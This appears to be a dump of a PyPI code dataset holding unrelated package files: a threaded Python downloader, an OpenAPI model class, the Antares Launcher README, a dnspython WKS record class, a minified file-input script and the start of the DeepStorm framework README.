id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7 values |
|---|---|---|
/Moose-0.9.9b3.tar.gz/Moose-0.9.9b3/moose/models/downloader.py | from __future__ import unicode_literals
import os
import socket
import Queue
import urllib2
import httplib
from moose.utils._os import makedirs, makeparents, safe_join
from moose.utils.encoding import force_bytes
from moose.utils.module_loading import import_string
from moose.conf import settings
"""
Provides an uniform interface with multithreading, but in a blocked way.
The reason we provide the blocked worker is to offer a way to debug,
espacially when using actions like `export`.
"""
if settings.DEBUG:
import dummy_threading as _threading
else:
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
lock = _threading.Lock()
import logging
logger = logging.getLogger(__name__)
class DownloadWorker(_threading.Thread):
def __init__(self, queue, callback, stats, timeout, overwrite=False):
super(DownloadWorker, self).__init__()
self.queue = queue
self.callback = callback
# a mutex to count in threads
self.stats = stats
self.timeout = timeout
self.overwrite = overwrite
def run(self):
while True:
try:
data_model = self.queue.get(timeout=self.timeout)
if not self.overwrite and \
os.path.exists(data_model.dest_filepath):
self.stats.inc_value("download/conflict")
else:
data = self.fetch(data_model.filelink, data_model.retry)
if data != None:
self.write(data, data_model.dest_filepath)
self.callback(data_model)
self.stats.inc_value("download/ok")
else:
if data_model.retry > 0:
data_model.retry -= 1
self.queue.put(data_model)
self.stats.inc_value("download/retry")
else:
self.stats.inc_value("download/failed")
self.queue.task_done()
except Queue.Empty as e:
break
def fetch(self, url, retry):
data = None
# Logs error only if it was the last time to try
warn = logger.error if retry == 0 else logger.info
try:
response = urllib2.urlopen(url, timeout=self.timeout)
data = response.read()
except urllib2.HTTPError, e:
self.stats.inc_value("download/http_error")
warn('falied to connect to %s, may for %s' % (url, e.reason))
except urllib2.URLError, e:
self.stats.inc_value("download/url_error")
warn('unable to open url %s for %s' % (url, e.reason))
except socket.error, e:
self.stats.inc_value("download/socket_error")
warn('socket error: %s' % url)
except httplib.BadStatusLine, e:
self.stats.inc_value("download/bad_status_line")
warn('BadStatusLine: %s' % url)
return data
def write(self, data, filepath):
lock.acquire()
makeparents(filepath)
lock.release()
with open(filepath, 'wb') as f:
f.write(data)
return
class ModelDownloader(object):
DEFAULT_WORKER_CLASS = "moose.models.downloader.DownloadWorker"
def __init__(self, callback, stats, worker_cls=None, timeout=None, overwrite=False, nworkers=10):
self.queue = Queue.Queue()
self.callback = callback
self.stats = stats
self.timeout = timeout or settings.DEFAULT_TIMEOUT
self.overwrite = overwrite
# Run in one loop if setting DEBUG mode
self.nworkers = nworkers
worker_cls_str = worker_cls if worker_cls else self.DEFAULT_WORKER_CLASS
self.worker_cls = import_string(worker_cls_str)
def start(self):
if not settings.DEBUG:
for i in range(self.nworkers):
worker = self.worker_cls(self.queue, self.callback, self.stats, \
self.timeout, self.overwrite)
worker.setDaemon(True)
worker.start()
def add_task(self, data_model):
try:
# For every models, we would like to try to fetch
# data from urls the model provides for 3 times,
# and give up if it never succeed.
data_model.retry = 3
self.queue.put(data_model)
except Queue.Full as e:
logger.error('Try to put an element in a full queue.')
raise e
def join(self):
if settings.DEBUG:
# waitting for data to be handled one by one
_worker = self.worker_cls(
self.queue, self.callback, self.stats, self.timeout, self.overwrite)
_worker.start()
else:
self.queue.join() | PypiClean |
/Altair%20Smartworks%20SDK-0.0.1.tar.gz/Altair Smartworks SDK-0.0.1/openapi_client/model/event_high_cpu_list_response.py | import re # noqa: F401
import sys # noqa: F401
from openapi_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from openapi_client.model.collection_list_response_paging import CollectionListResponsePaging
globals()['CollectionListResponsePaging'] = CollectionListResponsePaging
class EventHighCPUListResponse(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'data': ([object],), # noqa: E501
'paging': (CollectionListResponsePaging,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'data': 'data', # noqa: E501
'paging': 'paging', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""EventHighCPUListResponse - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
data ([object]): [optional] # noqa: E501
paging (CollectionListResponsePaging): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value) | PypiClean |
/Antares_Launcher-1.3.0.tar.gz/Antares_Launcher-1.3.0/README.md | # Antares Launcher
This program is intended to allow the user to send a list of Antares simulations to
a remote Linux machine that can run them using *SLURM Workload Manager*.
Currently, this program:
- Is configured to work with Antares studies from version 7.0 through 8.5
(the configuration can be changed in a YAML file).
- needs a remote UNIX server that uses *SLURM Workload Manager*.
The main workflow diagram is as follows:

## Requirements
See [`setup.py`](https://github.com/AntaresSimulatorTeam/antares-launcher/blob/main/setup.py)
Minimum version : python 3.8
### Main Python libraries
The following libraries are required to run the application in a production (or staging) environment:
- paramiko
- PyYAML
- tinydb
- tqdm
To install this library on production, you can run:
```shell
pip install Antares-Launcher
```
### Development and Unit Testing
To start developing, you can clone the repository from GitHub and create a Python virtualenv:
```shell
cd ~/workspace/
git clone https://github.com/AntaresSimulatorTeam/antares-launcher.git
cd ~/workspace/antares-launcher/
python3 -m venv venv
source venv/bin/activate
```
To run the unit tests, you need to install:
- pytest
- pytest-cov
- pytest-xdist
To install this library in development mode for testing, you can run:
```shell
pip install -e .[test]
```
Additional dependencies could also be used for development, for instance:
- black
- check-manifest
- isort
- mypy
### Documentation
In this project, we use Sphinx to generate the documentation.
Extra requirements are:
- m2r
- recommonmark
- sphinx
- sphinx_rtd_theme
## Installation
### Generation of the binary executable
In order to generate the binary file, execute the following command:
```
pyinstaller --additional-hooks-dir=antareslauncher/hooks/ -F antareslauncher/main_launcher.py -n Antares_Launcher
```
In order to generate the binary file of the light version of the launcher (reduced set of options), execute the
following command:
```
pyinstaller --additional-hooks-dir=antareslauncher/hooks/ -F antareslauncher/main_launcher_light.py -n Antares_Launcher_Light
```
The generated file will be inside the dist directory. Note that pyinstaller does not enable the cross-compilation: e
binary file generated on windows can only be expected with the windows OS
## Use Antares_Launcher
### Run Antares_Launcher
**Antares Launcher** can be used by running the executable file
By default, the program will:
- look for a configuration file necessary for the connection
named *ssh_config.json*.
If no value is given, it will look for it in default location with this order:
- 1st: current working directory
- 2nd: $HOME/antares_launcher_settings/ssh_config.json
- 3rd: default configuration (json file embedded in the data directory if present).
A default *ssh_config.json* file can be found in this
repository in the `./data` directory of the project
- look for an rsa-private ssh-key to access to the remote server.
The path of the key is specified in the `ssh_config.json` file
- look for a directory containing
the Antares studies to be run on the remote machine
named *STUDIES-IN*.
- put the results in the directory named
*FINISHED*
- create a directory *LOGS* that contains the logs of the programs
and several directories containing the three log files specific of each simulation.
Currently **antares_launcher** uses a specific configuration attached to the specific setting of
`data/launchAntares-${SCRIPT-VERSION}.sh`
#### Get the *how-to*
```
Antares_Launcher --help
```
will show how to use the program.
### SLURM script on the remote machine
In order to submit new jobs to the *SLURM* queue manager,
**Antares_Launcher** launches a bash-SLURM script the name of the script is set in `data/configuration.yaml`.
If Antares_Launcher fails to find this script
an exception will be raised and the execution will stop.
The specification of the script can be found in the class
`SlurmScriptFeatures` in the module `antareslauncher.slurm_script_features.py`.
See [Deploy Antares Launcher](#deploy-antares-launcher) for specific values.
## Useful commands
Since the addition of the Makefile to the project, one can now easily set a virtual environment, install requirements,
generate binary file, run tests, generate the doc and deploy it...
At the root of the directory, all the available commands can be seen with typing: make

If for example, you would like to run the test, a simple ``make test`` will do the trick

## Useful commands
Run unit tests:
```shell
pytest -v tests/
```
Run unit tests with code coverage:
```shell
pytest --cov=antareslauncher --cov-report=term-missing --cov-report=html --cov-branch tests/
open htmlcov/index.html
```
# Deploy Antares Launcher
## Installation on the remote server
In order to be able to accept jobs from Antares_Launcher, the remote machine needs to be ready:
the binaries and script expected by **Antares_Launcher** need to be installed and
the required ssh-public-keys need to be added to the `authorizedkeys` file
of the account of the remote server.
### Things to do
- `launchAntares-${SCRIPT-VERSION}.sh` should be copied to the remove server
and ist path should be set in `data/configuration.yaml`
- Install the Antares solver binary `antares-x.x-solver` on the remote server.
set its installation path in `launchAntares-${SCRIPT-VERSION}.sh`
- The R Xpansion script, `data/XpansionArgsRun.R`,
has to be copied to the remote server and
its path should be set in `launchAntares-${SCRIPT-VERSION}.sh`.
#### Important notice
The users currently copy the executable every time they need to use it.
This is not practical, an alternative should be developed.
## Installation of R packages on the remote server
In order to correctly install or update packages to be used on the remote server
the *R*repositories and installation-destination need to be set.
The `launchAntares-${SCRIPT-VERSION}.sh` set the variable where the *R*libraries are installed runtime,
no need to create a `.Renviron` file.
| PypiClean |
/Electrum-VTC-2.9.3.3.tar.gz/Electrum-VTC-2.9.3.3/packages/dns/rdtypes/IN/WKS.py |
import socket
import struct
import dns.ipv4
import dns.rdata
from dns._compat import xrange
_proto_tcp = socket.getprotobyname('tcp')
_proto_udp = socket.getprotobyname('udp')
class WKS(dns.rdata.Rdata):
"""WKS record
@ivar address: the address
@type address: string
@ivar protocol: the protocol
@type protocol: int
@ivar bitmap: the bitmap
@type bitmap: string
@see: RFC 1035"""
__slots__ = ['address', 'protocol', 'bitmap']
def __init__(self, rdclass, rdtype, address, protocol, bitmap):
super(WKS, self).__init__(rdclass, rdtype)
self.address = address
self.protocol = protocol
if not isinstance(bitmap, bytearray):
self.bitmap = bytearray(bitmap)
else:
self.bitmap = bitmap
def to_text(self, origin=None, relativize=True, **kw):
bits = []
for i in xrange(0, len(self.bitmap)):
byte = self.bitmap[i]
for j in xrange(0, 8):
if byte & (0x80 >> j):
bits.append(str(i * 8 + j))
text = ' '.join(bits)
return '%s %d %s' % (self.address, self.protocol, text)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
address = tok.get_string()
protocol = tok.get_string()
if protocol.isdigit():
protocol = int(protocol)
else:
protocol = socket.getprotobyname(protocol)
bitmap = bytearray()
while 1:
token = tok.get().unescape()
if token.is_eol_or_eof():
break
if token.value.isdigit():
serv = int(token.value)
else:
if protocol != _proto_udp and protocol != _proto_tcp:
raise NotImplementedError("protocol must be TCP or UDP")
if protocol == _proto_udp:
protocol_text = "udp"
else:
protocol_text = "tcp"
serv = socket.getservbyname(token.value, protocol_text)
i = serv // 8
l = len(bitmap)
if l < i + 1:
for j in xrange(l, i + 1):
bitmap.append(0)
bitmap[i] = bitmap[i] | (0x80 >> (serv % 8))
bitmap = dns.rdata._truncate_bitmap(bitmap)
return cls(rdclass, rdtype, address, protocol, bitmap)
def to_wire(self, file, compress=None, origin=None):
file.write(dns.ipv4.inet_aton(self.address))
protocol = struct.pack('!B', self.protocol)
file.write(protocol)
file.write(self.bitmap)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
address = dns.ipv4.inet_ntoa(wire[current: current + 4])
protocol, = struct.unpack('!B', wire[current + 4: current + 5])
current += 5
rdlen -= 5
bitmap = wire[current: current + rdlen].unwrap()
return cls(rdclass, rdtype, address, protocol, bitmap) | PypiClean |
/Flask-MDBootstrap-3.0.5.tar.gz/Flask-MDBootstrap-3.0.5/flask_mdbootstrap/static/MDB-Pro/js/modules/file-input.min.js | !function(t){var n={};function r(e){if(n[e])return n[e].exports;var o=n[e]={i:e,l:!1,exports:{}};return t[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t.__esModule)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var o in t)r.d(e,o,function(n){return t[n]}.bind(null,o));return e},r.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=156)}([function(t,n,r){(function(n){var r=function(t){return t&&t.Math==Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof n&&n)||Function("return this")()}).call(this,r(54))},function(t,n){t.exports=function(t){try{return!!t()}catch(t){return!0}}},function(t,n,r){var e=r(0),o=r(12),u=r(26),i=r(46),c=e.Symbol,f=o("wks");t.exports=function(t){return f[t]||(f[t]=i&&c[t]||(i?c:u)("Symbol."+t))}},function(t,n){var r={}.hasOwnProperty;t.exports=function(t,n){return r.call(t,n)}},function(t,n,r){var e=r(0),o=r(22).f,u=r(6),i=r(14),c=r(21),f=r(47),a=r(48);t.exports=function(t,n){var r,s,p,l,v,y=t.target,d=t.global,h=t.stat;if(r=d?e:h?e[y]||c(y,{}):(e[y]||{}).prototype)for(s in n){if(l=n[s],p=t.noTargetGet?(v=o(r,s))&&v.value:r[s],!a(d?s:y+(h?".":"#")+s,t.forced)&&void 0!==p){if(typeof l==typeof 
p)continue;f(l,p)}(t.sham||p&&p.sham)&&u(l,"sham",!0),i(r,s,l,t)}}},function(t,n){t.exports=function(t){return"object"==typeof t?null!==t:"function"==typeof t}},function(t,n,r){var e=r(7),o=r(9),u=r(18);t.exports=e?function(t,n,r){return o.f(t,n,u(1,r))}:function(t,n,r){return t[n]=r,t}},function(t,n,r){var e=r(1);t.exports=!e((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a}))},function(t,n,r){var e=r(5);t.exports=function(t){if(!e(t))throw TypeError(String(t)+" is not an object");return t}},function(t,n,r){var e=r(7),o=r(33),u=r(8),i=r(20),c=Object.defineProperty;n.f=e?c:function(t,n,r){if(u(t),n=i(n,!0),u(r),o)try{return c(t,n,r)}catch(t){}if("get"in r||"set"in r)throw TypeError("Accessors not supported");return"value"in r&&(t[n]=r.value),t}},function(t,n,r){var e=r(27),o=r(13);t.exports=function(t){return e(o(t))}},function(t,n,r){var e=r(15),o=Math.min;t.exports=function(t){return t>0?o(e(t),9007199254740991):0}},function(t,n,r){var e=r(30),o=r(55);(t.exports=function(t,n){return o[t]||(o[t]=void 0!==n?n:{})})("versions",[]).push({version:"3.3.2",mode:e?"pure":"global",copyright:"© 2019 Denis Pushkarev (zloirock.ru)"})},function(t,n){t.exports=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t}},function(t,n,r){var e=r(0),o=r(12),u=r(6),i=r(3),c=r(21),f=r(34),a=r(28),s=a.get,p=a.enforce,l=String(f).split("toString");o("inspectSource",(function(t){return f.call(t)})),(t.exports=function(t,n,r,o){var f=!!o&&!!o.unsafe,a=!!o&&!!o.enumerable,s=!!o&&!!o.noTargetGet;"function"==typeof r&&("string"!=typeof n||i(r,"name")||u(r,"name",n),p(r).source=l.join("string"==typeof n?n:"")),t!==e?(f?!s&&t[n]&&(a=!0):delete t[n],a?t[n]=r:u(t,n,r)):a?t[n]=r:c(n,r)})(Function.prototype,"toString",(function(){return"function"==typeof this&&s(this).source||f.call(this)}))},function(t,n){var r=Math.ceil,e=Math.floor;t.exports=function(t){return isNaN(t=+t)?0:(t>0?e:r)(t)}},function(t,n,r){var e=r(13);t.exports=function(t){return 
Object(e(t))}},function(t,n){var r={}.toString;t.exports=function(t){return r.call(t).slice(8,-1)}},function(t,n){t.exports=function(t,n){return{enumerable:!(1&t),configurable:!(2&t),writable:!(4&t),value:n}}},function(t,n){t.exports={}},function(t,n,r){var e=r(5);t.exports=function(t,n){if(!e(t))return t;var r,o;if(n&&"function"==typeof(r=t.toString)&&!e(o=r.call(t)))return o;if("function"==typeof(r=t.valueOf)&&!e(o=r.call(t)))return o;if(!n&&"function"==typeof(r=t.toString)&&!e(o=r.call(t)))return o;throw TypeError("Can't convert object to primitive value")}},function(t,n,r){var e=r(0),o=r(6);t.exports=function(t,n){try{o(e,t,n)}catch(r){e[t]=n}return n}},function(t,n,r){var e=r(7),o=r(40),u=r(18),i=r(10),c=r(20),f=r(3),a=r(33),s=Object.getOwnPropertyDescriptor;n.f=e?s:function(t,n){if(t=i(t),n=c(n,!0),a)try{return s(t,n)}catch(t){}if(f(t,n))return u(!o.f.call(t,n),t[n])}},function(t,n){t.exports=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"]},function(t,n,r){var e=r(57),o=r(27),u=r(16),i=r(11),c=r(42),f=[].push,a=function(t){var n=1==t,r=2==t,a=3==t,s=4==t,p=6==t,l=5==t||p;return function(v,y,d,h){for(var g,x,b=u(v),m=o(b),j=e(y,d,3),O=i(m.length),w=0,S=h||c,P=n?S(v,O):r?S(v,0):void 0;O>w;w++)if((l||w in m)&&(x=j(g=m[w],w,b),t))if(n)P[w]=x;else if(x)switch(t){case 3:return!0;case 5:return g;case 6:return w;case 2:f.call(P,g)}else if(s)return!1;return p?-1:a||s?s:P}};t.exports={forEach:a(0),map:a(1),filter:a(2),some:a(3),every:a(4),find:a(5),findIndex:a(6)}},function(t,n,r){var e=r(12),o=r(26),u=e("keys");t.exports=function(t){return u[t]||(u[t]=o(t))}},function(t,n){var r=0,e=Math.random();t.exports=function(t){return"Symbol("+String(void 0===t?"":t)+")_"+(++r+e).toString(36)}},function(t,n,r){var e=r(1),o=r(17),u="".split;t.exports=e((function(){return!Object("z").propertyIsEnumerable(0)}))?function(t){return"String"==o(t)?u.call(t,""):Object(t)}:Object},function(t,n,r){var 
e,o,u,i=r(56),c=r(0),f=r(5),a=r(6),s=r(3),p=r(25),l=r(19),v=c.WeakMap;if(i){var y=new v,d=y.get,h=y.has,g=y.set;e=function(t,n){return g.call(y,t,n),n},o=function(t){return d.call(y,t)||{}},u=function(t){return h.call(y,t)}}else{var x=p("state");l[x]=!0,e=function(t,n){return a(t,x,n),n},o=function(t){return s(t,x)?t[x]:{}},u=function(t){return s(t,x)}}t.exports={set:e,get:o,has:u,enforce:function(t){return u(t)?o(t):e(t,{})},getterFor:function(t){return function(n){var r;if(!f(n)||(r=o(n)).type!==t)throw TypeError("Incompatible receiver, "+t+" required");return r}}}},function(t,n,r){var e=r(37),o=r(23).concat("length","prototype");n.f=Object.getOwnPropertyNames||function(t){return e(t,o)}},function(t,n){t.exports=!1},function(t,n,r){var e=r(17);t.exports=Array.isArray||function(t){return"Array"==e(t)}},function(t,n,r){var e=r(45),o=r(0),u=function(t){return"function"==typeof t?t:void 0};t.exports=function(t,n){return arguments.length<2?u(e[t])||u(o[t]):e[t]&&e[t][n]||o[t]&&o[t][n]}},function(t,n,r){var e=r(7),o=r(1),u=r(36);t.exports=!e&&!o((function(){return 7!=Object.defineProperty(u("div"),"a",{get:function(){return 7}}).a}))},function(t,n,r){var e=r(12);t.exports=e("native-function-to-string",Function.toString)},function(t,n,r){var e=r(8),o=r(63),u=r(23),i=r(19),c=r(64),f=r(36),a=r(25)("IE_PROTO"),s=function(){},p=function(){var t,n=f("iframe"),r=u.length;for(n.style.display="none",c.appendChild(n),n.src=String("javascript:"),(t=n.contentWindow.document).open(),t.write("<script>document.F=Object<\/script>"),t.close(),p=t.F;r--;)delete p.prototype[u[r]];return p()};t.exports=Object.create||function(t,n){var r;return null!==t?(s.prototype=e(t),r=new s,s.prototype=null,r[a]=t):r=p(),void 0===n?r:o(r,n)},i[a]=!0},function(t,n,r){var e=r(0),o=r(5),u=e.document,i=o(u)&&o(u.createElement);t.exports=function(t){return i?u.createElement(t):{}}},function(t,n,r){var e=r(3),o=r(10),u=r(39).indexOf,i=r(19);t.exports=function(t,n){var r,c=o(t),f=0,a=[];for(r in 
c)!e(i,r)&&e(c,r)&&a.push(r);for(;n.length>f;)e(c,r=n[f++])&&(~u(a,r)||a.push(r));return a}},function(t,n,r){var e=r(15),o=Math.max,u=Math.min;t.exports=function(t,n){var r=e(t);return r<0?o(r+n,0):u(r,n)}},function(t,n,r){var e=r(10),o=r(11),u=r(38),i=function(t){return function(n,r,i){var c,f=e(n),a=o(f.length),s=u(i,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:i(!0),indexOf:i(!1)}},function(t,n,r){"use strict";var e={}.propertyIsEnumerable,o=Object.getOwnPropertyDescriptor,u=o&&!e.call({1:2},1);n.f=u?function(t){var n=o(this,t);return!!n&&n.enumerable}:e},function(t,n,r){var e=r(37),o=r(23);t.exports=Object.keys||function(t){return e(t,o)}},function(t,n,r){var e=r(5),o=r(31),u=r(2)("species");t.exports=function(t,n){var r;return o(t)&&("function"!=typeof(r=t.constructor)||r!==Array&&!o(r.prototype)?e(r)&&null===(r=r[u])&&(r=void 0):r=void 0),new(void 0===r?Array:r)(0===n?0:n)}},function(t,n){n.f=Object.getOwnPropertySymbols},function(t,n,r){"use strict";var e=r(4),o=r(24).find,u=r(51),i=!0;"find"in[]&&Array(1).find((function(){i=!1})),e({target:"Array",proto:!0,forced:i},{find:function(t){return o(this,t,arguments.length>1?arguments[1]:void 0)}}),u("find")},function(t,n,r){t.exports=r(0)},function(t,n,r){var e=r(1);t.exports=!!Object.getOwnPropertySymbols&&!e((function(){return!String(Symbol())}))},function(t,n,r){var e=r(3),o=r(53),u=r(22),i=r(9);t.exports=function(t,n){for(var r=o(n),c=i.f,f=u.f,a=0;a<r.length;a++){var s=r[a];e(t,s)||c(t,s,f(n,s))}}},function(t,n,r){var e=r(1),o=/#|\.prototype\./,u=function(t,n){var r=c[i(t)];return r==a||r!=f&&("function"==typeof n?e(n):!!n)},i=u.normalize=function(t){return String(t).replace(o,".").toLowerCase()},c=u.data={},f=u.NATIVE="N",a=u.POLYFILL="P";t.exports=u},function(t,n){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},function(t,n,r){var 
e=r(1),o=r(2)("species");t.exports=function(t){return!e((function(){var n=[];return(n.constructor={})[o]=function(){return{foo:1}},1!==n[t](Boolean).foo}))}},function(t,n,r){var e=r(2),o=r(35),u=r(6),i=e("unscopables"),c=Array.prototype;null==c[i]&&u(c,i,o(null)),t.exports=function(t){c[i][t]=!0}},function(t,n,r){"use strict";var e=r(1);t.exports=function(t,n){var r=[][t];return!r||!e((function(){r.call(null,n||function(){throw 1},1)}))}},function(t,n,r){var e=r(32),o=r(29),u=r(43),i=r(8);t.exports=e("Reflect","ownKeys")||function(t){var n=o.f(i(t)),r=u.f;return r?n.concat(r(t)):n}},function(t,n){var r;r=function(){return this}();try{r=r||new Function("return this")()}catch(t){"object"==typeof window&&(r=window)}t.exports=r},function(t,n,r){var e=r(0),o=r(21),u=e["__core-js_shared__"]||o("__core-js_shared__",{});t.exports=u},function(t,n,r){var e=r(0),o=r(34),u=e.WeakMap;t.exports="function"==typeof u&&/native code/.test(o.call(u))},function(t,n,r){var e=r(49);t.exports=function(t,n,r){if(e(t),void 0===n)return t;switch(r){case 0:return function(){return t.call(n)};case 1:return function(r){return t.call(n,r)};case 2:return function(r,e){return t.call(n,r,e)};case 3:return function(r,e,o){return t.call(n,r,e,o)}}return function(){return t.apply(n,arguments)}}},,,,,,function(t,n,r){var e=r(7),o=r(9),u=r(8),i=r(41);t.exports=e?Object.defineProperties:function(t,n){u(t);for(var r,e=i(n),c=e.length,f=0;c>f;)o.f(t,r=e[f++],n[r]);return t}},function(t,n,r){var e=r(32);t.exports=e("document","documentElement")},,,,,,,,,,,,,,function(t,n,r){"use strict";var e=r(4),o=r(27),u=r(10),i=r(52),c=[].join,f=o!=Object,a=i("join",",");e({target:"Array",proto:!0,forced:f||a},{join:function(t){return c.call(u(this),void 0===t?",":t)}})},,,,,,,,,,,,,,,,,,,,function(t,n,r){"use strict";var e=r(4),o=r(24).map;e({target:"Array",proto:!0,forced:!r(50)("map")},{map:function(t){return o(this,t,arguments.length>1?arguments[1]:void 0)}})},,,,,,,,,,,,,,,,,,,,,,,,function(t,n,r){var 
e=r(7),o=r(9).f,u=Function.prototype,i=u.toString,c=/^\s*function ([^ (]*)/;!e||"name"in u||o(u,"name",{configurable:!0,get:function(){try{return i.call(this).match(c)[1]}catch(t){return""}}})},,,,,,,,,,,function(t,n,r){var e=r(4),o=r(134).values;e({target:"Object",stat:!0},{values:function(t){return o(t)}})},function(t,n,r){var e=r(7),o=r(41),u=r(10),i=r(40).f,c=function(t){return function(n){for(var r,c=u(n),f=o(c),a=f.length,s=0,p=[];a>s;)r=f[s++],e&&!i.call(c,r)||p.push(t?[r,c[r]]:c[r]);return p}};t.exports={entries:c(!0),values:c(!1)}},,,,,,,,,,,,,,,,,,,,,,function(t,n,r){"use strict";r.r(n);r(44),r(78),r(98),r(122),r(133);jQuery((function(t){t(document).on("change",'.file-field input[type="file"]',(function(){var n=t(this),r=n.closest(".file-field").find("input.file-path"),e=n.get(0).files,o=[];o=Array.isArray(e)?e.map((function(t){return t.name})):Object.values(e).map((function(t){return t.name})),r.val(o.join(", ")),r.trigger("change")}))}))}]); | PypiClean |
/DeepStorm-1.0.5.tar.gz/DeepStorm-1.0.5/README.md | # DeepStorm: Deep Learning Framework
## Summary:
Deep Learning Framework from scratch, with an API of a combination of pytorch and keras APIs, only uses numpy for tensor operations.
## Pip install:
```sh
pip install DeepStorm
```
## Layers & DL classes in framework:
- Conv2d
- MaxPool2d
- BatchNorm2d
- Flatten
- Dropout
- Linear
- ReLU
- Softmax
- SgdWithMomentum
- Adam
- CrossEntropyLoss
- Xavier
- He
## Model building:
```py
layers = [
Conv2d(in_channels=1, out_channels=32,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(32),
Dropout(probability=0.3),
ReLU(),
Conv2d(in_channels=32, out_channels=64,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(64),
ReLU(),
MaxPool2d(kernel_size=2, stride=2),
Conv2d(in_channels=64, out_channels=64,
kernel_size=3, stride=1, padding='same'),
BatchNorm2d(64),
ReLU(),
MaxPool2d(kernel_size=2, stride=2),
Flatten(),
Linear(in_features=64*7*7, out_features=128),
ReLU(),
Linear(128, 64),
ReLU(),
Linear(64, 10),
SoftMax(),
]
model = Model(layers)
```
Or
```py
model = Model()
model.append_layer(Conv2d(in_channels=1, out_channels=32,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(32))
model.append_layer(ReLU())
model.append_layer(Conv2d(in_channels=32, out_channels=64,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(64))
model.append_layer(ReLU())
model.append_layer(MaxPool2d(kernel_size=2, stride=2))
model.append_layer(Conv2d(in_channels=64, out_channels=64,
kernel_size=3, stride=1, padding='same'))
model.append_layer(BatchNorm2d(64))
model.append_layer(ReLU())
model.append_layer(MaxPool2d(kernel_size=2, stride=2))
model.append_layer(Flatten())
model.append_layer(Linear(in_features=64*7*7, out_features=128))
model.append_layer(ReLU())
